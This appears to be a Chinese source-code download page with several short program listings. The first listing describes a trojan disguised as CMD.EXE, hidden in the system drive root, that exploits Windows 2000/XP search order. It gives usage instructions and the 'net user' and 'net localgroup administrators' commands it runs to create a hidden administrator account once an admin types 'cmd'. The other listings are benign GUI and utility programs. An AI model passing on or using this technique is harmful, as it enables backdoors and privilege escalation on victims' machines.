你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
用Java开发Linux GUI应用,图形界面帮手
上传时间: 2013-12-18
上传用户:lili123
自动扫雷机 v1.0 1.双语版(中文,英文),能自动检测操作系统版本和语言,采用相应的界面和扫雷规则 2.可以自动完成扫雷过程, 在Athlon 1G上的最好成绩为: 初级:1秒 中级:1秒 高级:2秒 3.可以控制扫雷窗口的时钟的快慢,甚至停止 缺点:人工智能推理部分做得不是很理想,希望大家能帮忙改善.
上传时间: 2013-12-18
上传用户:gxmm
你在做网页嘛,如果是的话,这是你不可多得的超Cool工具。这是可以自动生成网页特效的软件,每个特效都可以有您进行参数设置,100%傻瓜性。收集了包括时间特效,文字特效,图像处理,鼠标特效,页面特效,菜单特效,在线游戏,其它特效在内的八类上百个精彩特效。这些特效都是使用率比较高的JavaScript代码,您可以直接使用。软件内置浏览器,您可以随时预览特效效果;特效制作好之后,您可以把它复制到剪贴板,或者保存到文件中;软件的界面美观新颖,操作简单明了,极易上手。轻轻点几下鼠标,又炫又酷的网页任你选!
上传时间: 2013-12-12
上传用户:缥缈
数据库界面自动生成的控件
上传时间: 2013-12-26
上传用户:x4587
一个用Flash做的飞一般飞行菜单,很cool
上传时间: 2013-12-01
上传用户:Breathe0125
用MATLAB开发,一个界面还可以的计算器
上传时间: 2014-11-22
上传用户:franktu
一个学生信息管理系统,使用了多中数值算法,有HASH查找,归并排序,堆排序,快速排序,界面也不错
上传时间: 2015-01-14
上传用户:watch100
用Java写出一个“欢迎光临”的界面。
标签: Java
上传时间: 2015-01-14
上传用户:zhouchang199
用Java实现图形界面下的字符输出
上传时间: 2013-12-14
上传用户:czl10052678
